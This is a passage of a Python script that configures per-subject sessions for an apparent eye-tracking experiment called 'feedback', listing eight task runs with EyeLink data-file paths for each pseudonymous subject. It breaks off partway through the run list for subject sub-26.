presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 29)
sj_session1 = 'sub-17_290617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-17_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
####################################################################################################################################################################################
if which_subject == 'sub-18':
# subject information
initials = 'sub-18'
firstName = 'sub-18'
standardFSID = 'sub-18_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 8, 23)
sj_session1 = 'sub-18_230817'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-18_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-19':
# subject information
initials = 'sub-19'
firstName = 'sub-19'
standardFSID = 'sub-19_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-19_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-20':
# subject information
initials = 'sub-20'
firstName = 'sub-20'
standardFSID = 'sub-20_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-20_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-21':
# subject information
initials = 'sub-21'
firstName = 'sub-21'
standardFSID = 'sub-21_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 29)
sj_session1 = 'sub-21_290617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-05':
# subject information
initials = 'sub-05'
firstName = 'sub-05'
standardFSID = 'sub-05_180717'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 7, 18)
sj_session1 = 'sub-05_180717'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-22':
# subject information
initials = 'sub-22'
firstName = 'sub-22'
standardFSID = 'sub-22_220611'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-22_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-23':
# subject information
initials = 'sub-23'
firstName = 'sub-23'
standardFSID = 'sub-23_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 10, 11)
sj_session1 = 'sub-23_111017'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-24':
# subject information
initials = 'sub-24'
firstName = 'sub-24'
standardFSID = 'sub-24_180711'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 7, 18)
sj_session1 = 'sub-24_180717'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-09':
# subject information
initials = 'sub-09'
firstName = 'sub-09'
standardFSID = 'sub-09_250711'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 19)
sj_session1 = 'sub-09_190617'
# if s == 2:
# sessionDate = datetime.date(2016, 2, 8)
# sj_session2 = 'sub-09_080216'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-25':
# subject information
initials = 'sub-25'
firstName = 'sub-25'
standardFSID = 'sub-25_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-25_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-26':
# subject information
initials = 'sub-26'
firstName = 'sub-26'
standardFSID = 'sub-26_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-26_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
